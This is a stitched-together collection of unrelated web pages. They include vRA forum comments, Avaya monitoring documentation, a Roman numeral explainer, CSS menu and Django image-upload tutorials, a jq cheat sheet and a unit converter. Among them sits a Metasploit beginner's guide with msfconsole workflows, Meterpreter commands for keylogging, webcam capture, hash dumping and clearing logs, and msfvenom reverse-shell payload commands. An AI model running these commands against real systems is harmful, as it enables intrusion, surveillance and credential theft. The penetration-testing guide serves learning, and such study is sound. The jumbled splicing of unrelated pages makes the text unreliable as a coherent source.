7. Thanks for updating this to work with 7! I did notice a small item regarding multi-tenancy. It looks like you can only run the install for a single tenant. When I deployed this I deployed it to the default tenant which worked great, but when I ran the install workflow for a subtenant the workflow skipped creating the EBS. Once I deleted the EBS from the default tenant and then ran the install again against the subtenant it correctly created the EBS for the subtenant. I haven’t dug into it yet but I suspect it might be something to do with the switch script in the workflow. Thanks again for all of your hard work!
8. Why vra 7 limit number of machine prefix to 30 instead of Unlimited
When a acces to Blueprint configuration, I can see only the first 30 Machine Prefix. the 31 32 … will be removed from blueprints configured earlier.
I hope to find the solution asap
Many thank’s
9. Hi,
Did you manage to get anywhere with manipulating vRA 7 Deployment names/attributes?
I too am unable to determine how to do (was easy in vCAC 6 using the parent object of vCAC VM entity).
Bit of a limitation at the moment so if you have any further info on the subject would be gratefully received.
Many thanks
10. I think this is because of this property in the property group of the custom hostname properties:
Custom.ComponentMachine.NoIndexOnFirst
11. Hello,
I’m having randomly the following issue causing the renaming not to work:
———————–
You cannot use snapshot isolation to access table ‘dbo.VirtualMachine’ directly or indirectly in database ” to update, delete, or insert the row that has been modified or deleted by another transaction. Retry the transaction or change the isolation level for the update/delete statement
———————–
I checked https://technet.microsoft.com/en-us/library/ms175095(v=sql.105) and both READ_COMMITTED_SNAPSHOT and ALLOW_SNAPSHOT_ISOLATION are ON.
Any help is appreciated.
Thank you
1. Unfortunately the custom naming module along with some of the others are no longer maintained. Sorry you are having difficulties with it, hope you have successfully resolved your issues.
12. Hi
My customer have different custom property to choose DataCenter location Environment and Network in BP Form. So, before i defined prefix machine but my BP is Dynamical (Production/Dev) and it’s not compatible with that. The convention name is depend of user choice How to define structure name with input user parameter from Blueprint form ?
Thanks
Best Regard
Mikael
Leave a Reply to topuli Cancel reply
|
__label__pos
| 0.945876 |
3.22 SecurityViolations
Use this Knowledge Script to monitor the following security violations:
• Barrier code violations
• Calls that generated authorization code violations
• Calls that generated station security code violations
NOTE:If you bypass SNMP to discover a call manager, this script is not available.
Barrier codes and authorization codes provide a level of security for remote call access to such telephony components as PBXs, switch features, and trunks. Station security codes enable the Personal Station Access feature and the Extended User Administration of Redirected Calls feature.
This script raises an event if a threshold is exceeded. In addition, this script generates data streams for monitored violations.
3.22.1 Resource Object
AvayaCM Active SPE object
3.22.2 Default Schedule
By default, this script runs every 5 minutes.
3.22.3 Setting Parameter Values
Set the following parameters as needed:
Parameter
How to Set It
General Settings
Job Failure Notification
Event severity when job fails
Set the event severity level, from 1 to 40, to indicate the importance of the failure of the SecurityViolations job. The default is 5.
Select port type to monitor
Select the type of login port you want to monitor for security violations. Choose from the following:
• All (default)
• SYSAM-LCL (local port)
• SYSAM-RMT (remote port)
• MAINT (maintenance port)
• SYS-Port (system port)
• MGR1 (management terminal connection port)
• NET (network controller port)
• EPN (EPN maintenance EIA port)
• INADS (initialization administration system port)
Enable use of SNMP GETBulk operations?
By default, this parameter is enabled, allowing the SecurityViolations Knowledge Script job to use GETNext and GETBulk SNMP requests to access Communication Manager MIBs.
Disable this parameter to allow the script to use only GETNext requests.
Not all MIB tables are extensive enough to need a GETBulk request.
A GETBulk request is faster, but more CPU-intensive than GETNext.
Number of rows to request for each GETBulk operation
Specify the number of rows from the MIB table to return in a GETBulk request. The default is 10 rows.
The number of rows determines how quickly MIB data is returned.
If CPU usage is too high, you can reduce the number of rows per GETBulk or disable the Enable use of SNMP GETBulk requests? parameter.
Interval to pause between GETBulk operations
Specify the number of milliseconds to wait between GETBulk requests. The default is 100 milliseconds.
The length of delay can help with managing CPU usage and speed of SNMP requests.
For example, a one-row GETBulk with a 100-millisecond delay between requests executes more slowly and uses less CPU than a GETNext request.
Monitor Violations for Barrier Codes
Event Notification
Raise event if number of violations for barrier codes exceeds threshold?
Select Yes to raise an event if the number of security violations for barrier codes exceeds the threshold you set. The default is Yes.
Threshold - Maximum violations for barrier codes
Specify the highest number of security violations for barrier codes that can occur before an event is raised. The default is 0 violations.
Event severity when number of violations for barrier codes exceeds threshold
Set the event severity level, from 1 to 40, to indicate the importance of an event in which the number of security violations for barrier codes exceeds the threshold. The default is 15.
Data Collection
Collect data for number of violations for barrier codes?
Select Yes to collect data for charts and reports. If enabled, data collection returns the number of security violations for barrier codes that occurred during the monitoring period. The default is unselected.
Monitor Violations for Authorization Codes
Event Notification
Raise event if number of calls that generated authorization code violations exceeds threshold?
Select Yes to raise an event if the number of calls that generated authorization code violations exceeds the threshold you set. The default is Yes.
Threshold - Maximum number of calls that generated authorization code violations
Specify the highest number of calls that can generate authorization code violations before an event is raised. The default is 0 calls.
Event severity when the number of calls that generated authorization code violations exceeds threshold
Set the event severity level, from 1 to 40, to indicate the importance of an event in which the number of calls that generated authorization code violations exceeds the threshold. The default is 15.
Data Collection
Collect data for the number of calls that generated authorization code violations?
Select Yes to collect data for charts and reports. If enabled, data collection returns the number of that generated authorization code violations during the monitoring period. The default is unselected.
Monitor Station Violations
Event Notification
Raise event if the number of calls that generated station violations exceeds threshold?
Select Yes to raise an event if the number of calls that generated station violations exceeds the threshold you set. The default is Yes.
Threshold - Maximum number of calls that generated station violations
Specify the highest number of calls that can generate station violations before an event is raised. The default is 0 calls.
Event severity when the number of calls that generated station violations exceeds threshold
Set the event severity level, from 1 to 40, to indicate the importance of an event in which the number of calls that generated station violations exceeds the threshold. The default is 15.
Data Collection
Collect data for the number of calls that generated station violations?
Select Yes to collect data for charts and reports. If enabled, data collection returns the number of calls that generated station violations during the monitoring period. The default is unselected.
|
__label__pos
| 0.928591 |
CXXXIX Roman Numeral | How to Write CXXXIX in Roman Numerals?
CXXXIX Roman Numeral
The sophisticated art of translating CXXXIX Roman Numerals into Hindu-Arabic numerals requires a deep understanding of the intricate value system of the Roman numerals. The elegant simplicity of CXXXIX, which translates to 139, is achieved by combining the values of each symbol in the sequence CXXXIX= C + XXX + IX = 100 + 30 + 9 = 139. This strategic placement of higher Roman numerals preceding lower numerals results in the accurate conversion of Roman numerals to Hindu-Arabic numerals. Join us in exploring this fascinating process in this informative article.
Roman NumeralNumber
CXXXIX139
CXXXIX in Roman Numerals
How to Write CXXXIX Roman Numerals?
How to Write CXXXIX Roman Numerals
How to Write CXXXIX Roman Numerals
There are 2 method to write CXXXIX Roman numeral in number:
1st Method to write CXXXIX Roman Numerals
In this method, we need to break the CXXXIX Roman Numerals into single letters such as: C,X,X,X,I,X and then add or subtract them as shown below.
CXXXIX = C + X + X + X + (X – I)
CXXXIX = 100 + 10 + 10 + 10 + (10 – 1)
CXXXIX = 100 + 30 + 9
CXXXIX = 139
2nd Method to write CXXXIX Roman Numerals
In this method we need to consider the groups of Roman Numerals Such as:
CXXXIX = C + XXX + IX
CXXXIX = 100 + 30 + 9
CXXXIX = 139
Hence, the Roman numerals CXXXIX written as 139 in number.
What are the Number Related to CXXXIX Roman numerals?
There are many number Relateds to CXXXIX Roman numerals. For example, the number 1390 can be written as MCXXXIX.
Numbers less than CXXXIX:
• CXXX = 130
• CXXXII = 132
• CXXXIII = 133
• CXXXIV = 134
• CXXXV = 135
• CXXXVI = 136
• CXXXVII = 137
• CXXXVIII = 138
Numbers greater than CXXXIX:
• CXL = 140
• CXLI = 141
• CXLII = 142
• CXLIII = 143
• CXLIV = 144
• CXLV = 145
• CXLVI = 146
• CXLVII = 147
What are the Basic Rules to Write Roman Numerals?
The ancient Romans used a system of letters for their numerals, where I, X, and C represented the values of 1, 10, and 100 respectively. The rules for combining these letters to express numbers were intricate, with additions and subtractions based on the relative sizes of the letters.
• For example, the letter CI represented 100 + 1 = 101, while XL represented 50 – 10 = 40.
• Additionally, repeating a letter 2 or 3 times added its value, as II equaled 1 + 1 = 2.
• However, a letter could not be used more than three times in a row.
• The letters V, L, and D were also not repeated. The system also allowed for subtractive notation, with only I, X, and C being eligible.
• This resulted in 6 combinations such as IV = 5 – 1 = 4, IX = 10 – 1 = 9, XL = 50 – 10 = 40, and so on.
CXXXIX Roman Numerals Examples
Frequently Asked Questions on CXXXIX Roman Numerals
What is the value of cxxxix?
The Value of cxxxix is 139 in number.
What is cxxxix roman numerals meaning?
The meaning of cxxxix roman numerals is 139 in words. It is written as follows:
CXXXIX = C + XXX + IX
C = 100
XXX = 30
IX = 9
How do I read CXXXIX in Roman Numerals?
To Read CXXXIX as “139” in modern Arabic numerals. Each symbol represents a unique value, and when combined, they form the desired numerical representation . For example CXXXIX= C + XXX + IX = 100 + 30 + 9 = 139.
what is cxxxix roman figure?
The Roman numeral CXXXIX is represented to the Arabic number 139.
About The Author
Knowledge Glow
I am Komal Gupta, the founder of Knowledge Glow, and my team and I aim to fuel dreams and help the readers achieve success. While you prepare for your competitive exams, we will be right here to assist you in improving your general knowledge and gaining maximum numbers from objective questions. We started this website in 2021 to help students prepare for upcoming competitive exams. Whether you are preparing for civil services or any other exam, our resources will be valuable in the process.
Related Posts
|
__label__pos
| 0.99995 |
WHAT'S NEW?
Loading...
Most Popular Topics
HTML and CSS only Drop Down Menu
Ok, let's keep this simple, that what you want after all isn't it!
The Look...
simple drop down menu
The Menu In Action...
And now the code...
The HTML...
Copy and paste the code below into your webpage. Edit the Text and links to suit your site.
The down arrow is achieved using the symbol code "& # x 2 5 B C" (without the spaces)
The CSS...
Copy and paste the code below into your CSS stylesheet. Edit the colours and padding to suit your site.
.navbar ul {
text-align: left;
display: inline;
margin: 0px ;
padding: 15px 4px 17px 0px ;
list-style: none ;
}
.navbar ul li {
font: bold 16px sans-serif;
color:#fff;
display: inline-block;
margin-right: -3px;
position: relative ;
padding: 15px 20px ;
background: #0099CC ;
}
.navbar ul li:hover {
background: #555;
color: #fff;
}
.navbar ul li ul {
padding: 0 ;
position: absolute;
top: 43px;
left: 0 ;
width: 180px ;
display: none ;
opacity: 0 ;
visibility: hidden;
-webkit-transiton: opacity 0.2s ;
-moz-transition: opacity 0.2s ;
-ms-transition: opacity 0.2s ;
-o-transition: opacity 0.2s ;
-transition: opacity 0.2s ;
}
.navbar ul li ul li {
background: #555 ;
display: block;
color: #fff ;
text-shadow: 0 -1px 0 #000;
}
.navbar ul li ul li:hover { background: #666; }
.navbar ul li:hover ul {
display: block ;
opacity: 1 ;
visibility: visible;
}
More web tips,templates and tutorials coming soon as part of our "month of web" at OnlineDesignTeacher. Follow us on Twitter and Facebook to be sure you don't miss out.
|
__label__pos
| 0.635199 |
Metasploit Essentials
September 19, 2023
September 19, 2023 Jasper
Hi! It is time to look at the essentials of Metasploit, an extremely powerful framework that automates a part of the penetation testing process. This beginner’s guide will walk you through the essential steps to get started with Metasploit, from installation to conducting your first penetration test. I will try to cover every step on the way to a succesfull exploit, while explaining basic concepts and theory.
I am making these walkthroughs to help solidify the knowledge I gain while on this exciting jouey. I hope that it can help others as well. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
metasploit logo
Introduction to Metasploit
Metasploit is a powerful penetration testing framework that allows cybersecurity professionals and ethical hackers to assess the security of networks and systems. To be more specific, Metasploit allows you to:
• Conduct network reconnaissance
• Find vulnerabilities on a target system
• Search for and run exploits abusing these vulnerabilities
• Transfer payloads and encode them
• Help with privilege escalation
So yes, Metasploit is extremely powerful! Use it wisely and you will obtain near limitless power, but don’t get dependant on it 🙂
By the way, if you are confused about the difference between exploits and payloads, I made the following article:
Exploits and Payloads Essentials
Remember that using msfvenom and the Metasploit Framework for unauthorized or malicious activities is illegal and unethical. Always ensure you have proper authorization and are using these tools for legitimate security testing or educational purposes. Wit that over with, let’s get started!
Install Metasploit
Metasploit is probably already installed on your system if you are using Kali Linux. If not, it is quickly installed by running the following command:
sudo apt install metasploit-framework
After installation, it’s crucial to keep Metasploit up-to-date to access the latest exploits and modules. Open a terminal or command prompt and run:
sudo apt update && sudo apt install metasploit-framework
Now we are ready to start up Metasploit. We will launch a command-line interface called the Metasploit Console. To start it, simply run:
msfconsole
Basic commands
You now have entered msfconsole, a command-line interface for the framework.
It is important to note that there is also a paid GUI version with greater functionality.
Here are some essential commands which we will cover during this artcle:
• help: Displays a list of available commands
• search <keyword>: Searches for modules based on a keyword.
• use <module>: Selects a module for use.
• show options: Displays the options available for the selected module.
• set <option> <value>: Sets the value of an option for the selected module.
• exploit` or run: Executes the selected module with the configured options.
That’s fine and all, but most of these commands mention modules. What are these? I’m glad you asked.
Modules
Metasploit is organized into various modules, including exploit modules, auxiliary modules, and post-exploitation modules.
It makes the most sense to think of these modules as a bundling of scripts divided into different categories. The exploit module for example, includes so-called proof-of-concept (POCs) that can be used to exploit existing vulnerabilities in a largely automated manner.
Searching for modules
Most of the times when you start msfconsole, you will start by using the search command, to find a specific module. (use help search if you want more help).
While you could just add a simple command like search eternal blue , this could theoretically return hundreds of modules since there are so many modules available in Metasploit. That’s why I recommend you to use search operators.
The following are search operators that are available:
• name
• path
• platform
• type
• app
• author
• cve
• bid
• osdvb
Of particular interest is the module type. Modules can have different types, and this is a major way to group them. The following types are available:
Type Description
Auxiliary Scanning, fuzzing, sniffing, and admin capabilities.
Encoders Ensure that payloads are intact to their destination.
Exploit Defined as modules that exploit a vulnerability that will allow for the payload delivery.
NOPs (No Operation code) Keep the payload sizes consistent across exploit attempts.
Payload Code runs remotely and calls back to the attacker machine to establish a connection (or shell).
Plugin Additional scripts can be integrated within an assessment with msfconsole and coexist.
Post Wide array of modules to gather information, pivot deeper, etc.
These search operators narrow the results you get from your search command. Examples of this are for example:
search platform:Windows
search type:exploit eternal blue
This will save you a lot of time!
Use-ing a module (selecting)
Once you’ve found a relevant exploit module, use the use command to select it:
use exploit/windows/smb/ms08_067_netapi
An alternative is to select the module by the specific id found in the search results:
use 7
Now that you have loaded a module, you can use the info command to read more about the selected module.
To proceed it is time to set the relevant options.
Setting options of a module
Use the show options command to see the available options for the selected module. Note, that these options can differ a lot between modules, so have a look at the options after selecting a new module.
When you found an option to change, you can use the set command to configure the necessary options for the selected exploit module, such as the target IP address and payload.
Parameters you will often use are:
• RHOSTS: “Remote host”, the IP address of the target system. A single IP address or a network range can be set. You can also use a file where targets are listed, one target per line using file:/path/of/the/target_file.txt.
• RPORT: “Remote port”, the port on the target system the vulnerable application is running on.
• LHOST: “Localhost”, the attacking machine (your AttackBox or Kali Linux) IP address.
• LPORT: “Local port”, the port you will use for the reverse shell to connect back to. This is a port on your attacking machine.
Here is an example:
set RHOSTS 10.10.25.71
set LPORT 4141
Running a module
Finally, execute the exploit using the exploit or run command.
Metasploit will attempt to exploit the target system based on your configurations. If you are lucky you will gain a shell on the target system. But often we need to adjust more settings. Let’s discuss other important Metasploit concepts now, such as targets, exploits, and Meterpreter shells..
Targets
Targets relate to the unique operation system identifier that will be targeted by the module. When you select a different target, the selected exploit module will adapt to run on that particular target OS. Some examples of when this is relevant is when some exploits need to specify the 64 or 32 bit architecture. Another example is that some exploits support several Windows versions. If you know this about the target, the chance of success will be higher.
To find out which targets are available for the selected exploit, we can run:
show targets
The show targets command issued within an exploit module view will display all available vulnerable targets for that specific exploit.
Generally, Metasploit is smart enough to set the right target, but in some cases it is a good idea to manually adjust it based on what you have learned about the target system.
Payloads
Once you’ve set the exploit options, you can choose the payload you want to use. There are two different type of payloads in Metasploit:
• Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
• Staged: Staged payloads will first upload a stager on the target system then download the rest of the payload (stage). This provides some advantages as the initial size of the payload will be relatively small, making these payloads less likely to be discovered.
Use the show payloads command to list available payloads for the selected exploit module. You might want to know if a payload is staged or single. If we look at: windows/shell/reverse_tcp and windows/shell_reverse_tcp, the one with the forward slash indicates that is a “staged” payload, the one with the underscore means it’s “single”.
Once you have found one you like you can use the set payload command followed by the name of the payload you want to use.
set payload windows/meterpreter/reverse_tcp
Or you can select the payload by using the id shown in the show payloads results.
set payload 16
After setting the payload we have to set some options again.
For the payload part, we will need to set the following two parameters:
LHOST: The attacker’s IP address
LPORT: Listener port on attacker’s machine
When you are done setting up you can once again run the exploit. Hopefully you will get a shell. Depending on the type of payload, you might get a meterpreter shell. A what you say?
Meterpreter Payload
Before we move on, an important concept to cover is the Meterpreter payload. This is a versatile payload that utilizes DLL injection to establish a stable and covert connection with the victim host. It is designed to be persistent across reboots or system changes, while remaining difficult to detect through conventional forensic techniques. Meterpreter operates entirely in the host’s memory, leaving no traces on the hard drive. Furthermore, it allows for dynamic loading and unloading of scripts and plugins as needed.
Upon execution of the Meterpreter payload, a new session is created, spawning the Meterpreter interface. This interface resembles the msfconsole interface, but its commands are focused on the target system that the payload has “infected.” It feels like a regular shell, but you should see it as a shell on steroids. It’s extremely powerful.
To give an idea on which commands you can use, here are the core commands in the output of the help menu:
Core commands
• background: Backgrounds the current session
• exit: Terminate the Meterpreter session
• guid: Get the session GUID (Globally Unique Identifier)
• help: Displays the help menu
• info: Displays information about a Post module
• irb: Opens an interactive Ruby shell on the current session
• load: Loads one or more Meterpreter extensions
• migrate: Allows you to migrate Meterpreter to another process
• run: Executes a Meterpreter script or Post module
• sessions: Quickly switch to another session
File system commands
• cd: Will change directory
• ls: Will list files in the current directory (dir will also work)
• pwd: Prints the current working directory
• edit: will allow you to edit a file
• cat: Will show the contents of a file to the screen
• rm: Will delete the specified file
• search: Will search for files
• upload: Will upload a file or directory
• download: Will download a file or directory
Networking commands
• arp: Displays the host ARP (Address Resolution Protocol) cache
• ifconfig: Displays network interfaces available on the target system
• netstat: Displays the network connections
• portfwd: Forwards a local port to a remote service
• route: Allows you to view and modify the routing table
System commands
• clearev: Clears the event logs
• execute: Executes a command
• getpid: Shows the current process identifier
• getuid: Shows the user that Meterpreter is running as
• kill: Terminates a process
• pkill: Terminates processes by name
• ps: Lists running processes
• reboot: Reboots the remote computer
• shell: Drops into a system command shell
• shutdown: Shuts down the remote computer
• sysinfo: Gets information about the remote system, such as OS
Others Commands
• idletime: Returns the number of seconds the remote user has been idle
• keyscan_dump: Dumps the keystroke buffer
• keyscan_start: Starts capturing keystrokes
• keyscan_stop: Stops capturing keystrokes
• screenshare: Allows you to watch the remote user’s desktop in real time
• screenshot: Grabs a screenshot of the interactive desktop
• record_mic: Records audio from the default microphone for X seconds
• webcam_chat: Starts a video chat
• webcam_list: Lists webcams
• webcam_snap: Takes a snapshot from the specified webcam
• webcam_stream: Plays a video stream from the specified webcam
• getsystem: Attempts to elevate your privilege to that of local system
• hashdump: Dumps the contents of the SAM database
Sessions & Post-Exploitation
If the exploitation is successful, you’ll enter a post-exploitation phase. You can use various post-exploitation modules to gather information, maintain access, and perform additional actions on the compromised system.
It is time to use some port-exploitation commands. Start by backgrounding your shell (Control-Z). Take a look at the session ID by entering sessions -l.
Listing the running sessions
Search for the right module by entering search enum. This came up:
This sounds interesting. Load it and set the session option to 1).
Now, you can run the post exploitation module which will run on the previously established session. You will now be able to run different actions that will increase your control over the system.
Encoders
Encoders are a feature I briefly want to mention, although perhaps not very essential at this point in our journey. Encoders are tools or techniques used to transform data in a way that makes it more difficult for security systems, such as intrusion detection systems (IDS) or antivirus software, to detect and block malicious payloads. Encoders are commonly employed when trying to evade detection during the exploitation phase of a penetration test or a real-world attack.
Encoders transform the original payload, which is typically shellcode or other forms of malicious code, into an altered form that still accomplishes the same objective but is no longer easily recognizable by signature-based security systems.
We can list the available encoders with show encoders.
Like the available payloads, these are automatically filtered according to the exploit module only to display the compatible ones.
MSFVenom
Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads. Msfvenom will allow you to access all payloads available in the Metasploit framework. Msfvenom allows you to create payloads in many different formats and for many different target systems.
Why is this even necessary? While msfconsole is perfect if you have a network connection to the target, sometimes you need to manually upload a payload to a server, or send it with an email. For this msfvenom is the right tool.
How to create a payload
When using msfvenom the general exploit steps are:
1. Generate the payload using MSFvenom
MSFvenom will require a payload, the local machine IP address, and the local port to which the payload will connect. A general payload is created like so:
msfvenom -p <payload> [options]
<payload>: Specify the payload you want to generate. This can be any payload supported by Metasploit, such as windows/meterpreter/reverse_tcp for a Windows Meterpreter reverse shell.
Depending on the payload and its specific requirements, you’ll need to provide additional options. These options vary depending on the payload, but common ones include:
• -f <format>: Specify the output format for the payload (e.g., exe, dll, python, bash).
• o <output_file>: Specify the filename for the generated payload.
• LHOST=<listener_IP>: Set the IP address of the listener (your attacking machine).
• LPORT=<listener_port>: Set the port number on which the payload will connect back to your listener.
Example payload commands:
Based on the target system’s configuration (operating system, installed webserver, interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few examples you will often use, depending on the target system:
• Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
• PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
• ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
• Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
2. Setup a listener:
To catch the incoming connection from the generated payload, you’ll need to set up a listener using the Metasploit Framework. You can do this for example by using the exploit/multi/handler.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <Attacker IP>
set LPORT <Attacker listening port>
exploit
3. Execute the Payload: Now that you have the payload and the listener set up, you can deliver the payload to the target system. The method of delivery will depend on your specific scenario, but common techniques include email attachments, social engineering, or exploiting vulnerabilities.
4. Session: If the payload execution is successful, you should see a Meterpreter session established in your msfconsole session. You can then interact with the compromised system using various Meterpreter commands.
Conclusion
Metasploit is a powerful tool for ethical hacking and penetration testing, but it should always be used responsibly and with proper authorization. This beginner’s guide provides a foundation for getting started with Metasploit, but there is much more to explore as you gain experience. Continuously learn and practice to become proficient in using this valuable cybersecurity tool.
Like my articles?
You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:
|
__label__pos
| 0.513169 |
Noelle.dev
jq Cheat Sheet
How to perform common operations on JSON documents.
jq is a very useful tool for parsing and manipulating JSON documents on the command line. For a comprehensive reference on all the features, see the jq manual.
The following examples will use this data.json document as input:
{
"name": "Julia Sommers",
"items": ["car", "horse", "laptop"],
"friends": [
{ "name": "Amanda Brush", "pet": "dog" },
{ "name": "January Stiles", "pet": "bird" },
{ "name": "Grace Rose", "pet": "bird" }
]
}
Identity
jq '.' data.json
{
"name": "Julia Sommers",
"items": ["car", "horse", "laptop"],
"friends": [
{
"name": "Amanda Brush",
"pet": "dog"
},
{
"name": "January Stiles",
"pet": "bird"
},
{
"name": "Grace Rose",
"pet": "bird"
}
]
}
Get single value from document
jq --raw-output '.name' data.json
Julia Sommers
Get the first N items of an array
jq '.items[:2]' data.json
["car", "horse"]
Map an array
jq '[.friends[] | .name]' data.json
["Amanda Brush", "January Stiles", "Grace Rose"]
Filter an array
jq '[.friends[] | select(.pet=="bird")]' data.json
[
{
"name": "January Stiles",
"pet": "bird"
},
{
"name": "Grace Rose",
"pet": "bird"
}
]
Reduce an array
jq --raw-output 'reduce .items[] as $item (""; . + $item)' data.json
carhorselaptop
Recursively get values from a key name
Return all the values associated with the name key, recursively.
jq --raw-output 'recurse | objects | .name' data.json
Julia Sommers
Amanda Brush
January Stiles
Grace Rose
|
__label__pos
| 0.924081 |
Nibble to Kilobit - 283 Nibble to kbit Conversion
High Precision Data Unit Conversion
Conversion History (Last 6)
Input Nibble - and press Enter
Nibble
RESULT ( Nibble → Kilobit ) :
283 Nibble = 1.132 kbit
Copy
Calculated as → 283 x 4 / 1000...view detailed steps
ADVERTISEMENT
Complete List of Nibble Converters
Quick Navigation
Nibble to kbit - Conversion Formula and Steps
Nibble and Kilobit are units of digital information used to measure storage capacity and data transfer rate. Nibble is one of the very basic digital unit where as Kilobit is a decimal unit. One Nibble is equal to 4 bits. One Kilobit is equal to 1000 bits. There are 250 Nibbles in one Kilobit.
Nibble to kbit Converter Image
Source Data UnitTarget Data Unit
Nibble
Equal to 4 bits
(Basic Unit)
Kilobit (kbit)
Equal to 1000 bits
(Decimal Unit)
The formula of converting the Nibble to Kilobit is represented as follows :
kbit = Nibble x 4 / 1000
Now let us apply the above formula and, write down the steps to convert from Nibble to Kilobit (kbit). This way, we can try to simplify and reduce to an easy to apply formula.
FORMULA
Kilobit = Nibble x 4 / 1000
STEP 1
Kilobit = Nibble x 0.004
If we apply the above Formula and steps, conversion from 283 Nibble to kbit, will be processed as below.
1. = 283 x 4 / 1000
2. = 283 x 0.004
3. = 1.132
4. i.e. 283 Nibble is equal to 1.132 kbit.
(Result rounded off to 40 decimal positions.)
Popular Nibble Conversions
Conversion Units
Definition : Nibble
A Nibble is a unit of digital information that consists of 4 bits. It is half of a byte and can represent a single hexadecimal digit. It is used in computer memory and data storage and sometimes used as a basic unit of data transfer in certain computer architectures.
- Learn more..
Definition : Kilobit
A Kilobit (kb or kbit) is a unit of digital information that is equal to 1000 bits. It is commonly used to express data transfer speeds, such as the speed of an internet connection and to measure the size of a file. In the context of data storage and memory, the binary-based unit of Kibibit (Kibit) is used instead.
- Learn more..
Excel Formula to convert from Nibble to kbit
Apply the formula as shown below to convert from 283 Nibble to Kilobit.
ABC
1NibbleKilobit (kbit)
2283=A2 * 0.004
3
Download - Excel Template for Nibble to Kilobit Conversion
If you want to perform bulk conversion locally in your system, then download and make use of above Excel template.
Python Code for Nibble to kbit Conversion
You can use below code to convert any value in Nibble to Kilobit in Python.
nibble = int(input("Enter Nibble: "))
kilobit = nibble * 4 / 1000
print("{} Nibble = {} Kilobit".format(nibble,kilobit))
The first line of code will prompt the user to enter the Nibble as an input. The value of Kilobit is calculated on the next line, and the code in third line will display the result.
|
__label__pos
| 0.82261 |
Python – Uploading images in Django
Python | Uploading images in Django
In most of the websites, we often deal with media data such as images, files etc. In django we can deal with the images with the help of model field which is ImageField.
In this article, we have created the app image_app in a sample project named image_upload.
The very first step is to add below code in the settings.py file.
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
MEDIA_ROOT is for server path to store files in the computer.
MEDIA_URL is the reference URL for browser to access the files over Http.
In the urls.py we should edit the configuration like this
from django.conf import settings
from django.conf.urls.static import static
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
A sample models.py should be like this, in that we have created a Hotel model which consists of hotel name and its image.
In this project we are taking the hotel name and its image from the user for hotel booking website.
# models.py
class Hotel(models.Model):
name = models.CharField(max_length=50)
hotel_Main_Img = models.ImageField(upload_to='images/')
Here upload_to will specify, to which directory the images should reside, by default django creates the directory under media directory which will be automatically created when we upload an image. No need of explicit creation of media directory.
We have to create a forms.py file under image_app, here we are dealing with model form to make content easier to understand.
# forms.py
from django import forms
from .models import *
class HotelForm(forms.ModelForm):
class Meta:
model = Hotel
fields = ['name', 'hotel_Main_Img']
Django will implicitly handle the form verification’s with out declaring explicitly in the script, and it will create the analogous form fields in the page according to model fields we specified in the models.py file.
This is the advantage of model form.
Now create a templates directory under image_app in that we have to create a html file for uploading the images. HTML file should look like this.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hotel_image</title>
</head>
<body>
<form method = "post" enctype="multipart/form-data">
{% csrf_token %}
{{ form.as_p }}
<button type="submit">Upload</button>
</form>
</body>
</html>
When making a POST request, we have to encode the data that forms the body of the request in some way. So, we have to specify the encoding format in the form tag. multipart/form-data is significantly more complicated but it allows entire files to be included in the data.
The csrf_token is for protection against Cross Site Request Forgeries.
form.as_p simply wraps all the elements in HTML paragraph tags. The advantage is not having to write a loop in the template to explicitly add HTML to surround each title and field.
In the views.py under image_app in that we have to write a view for taking requests from user and gives back some html page.
from django.http import HttpResponse
from django.shortcuts import render, redirect
from .forms import *
# Create your views here.
def hotel_image_view(request):
if request.method == 'POST':
form = HotelForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return redirect('success')
else:
form = HotelForm()
return render(request, 'hotel_image_form.html', {'form' : form})
def success(request):
return HttpResponse('successfully uploaded')
whenever the hotel_image_view hits and that request is POST, we are creating an instance of model form form = HotelForm(request.POST, request.FILES) image will be stored under request.FILES one. If it is valid save into the database and redirects to success url which indicates successful uploading of the image. If the method is not POST we are rendering with html template created.
urls.py will look like this –
from django.contrib import admin
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from .views import *
urlpatterns = [
path('image_upload', hotel_image_view, name = 'image_upload'),
path('success', success, name = 'success'),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
Now make the migrations and run the server.
When we hit the URL in the browser, in this way it looks.
After uploading the image it will show success.
Now in the project directory media directory will be created, in that images directory will be created and the image will be stored under it. Here is the final result.
Final output stored in our database
Final output stored in the database
Now we can write a view for accessing those images, for simplicity let’s take example with one image and it is also applicable for many images.
# Python program to view
# for displaying images
def display_hotel_images(request):
if request.method == 'GET':
# getting all the objects of hotel.
Hotels = Hotel.objects.all()
return render((request, 'display_hotel_images.html',
{'hotel_images' : Hotels}))
A sample html file template for displaying images.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hotel Images</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
</script>
</script>
</head>
<body>
{% for hotel in hotel_images %}
<div class="col-md-4">
{{ hotel.name }}
<img src="{{ hotel.hotel_Main_Img.url }}" class="img-responsive" style="width: 100%; float: left; margin-right: 10px;" />
</div>
{% endfor %}
</body>
</html>
Insert the url path in the urls.py file
# urls.py
path('hotel_images', display_hotel_images, name = 'hotel_images'),
Here is the final view on the browser when we try to access the image.
Final result in browser
Hotel Image
Last Updated on October 28, 2021 by admin
Leave a Reply
Your email address will not be published. Required fields are marked *
Recommended Blogs
|
__label__pos
| 0.633641 |
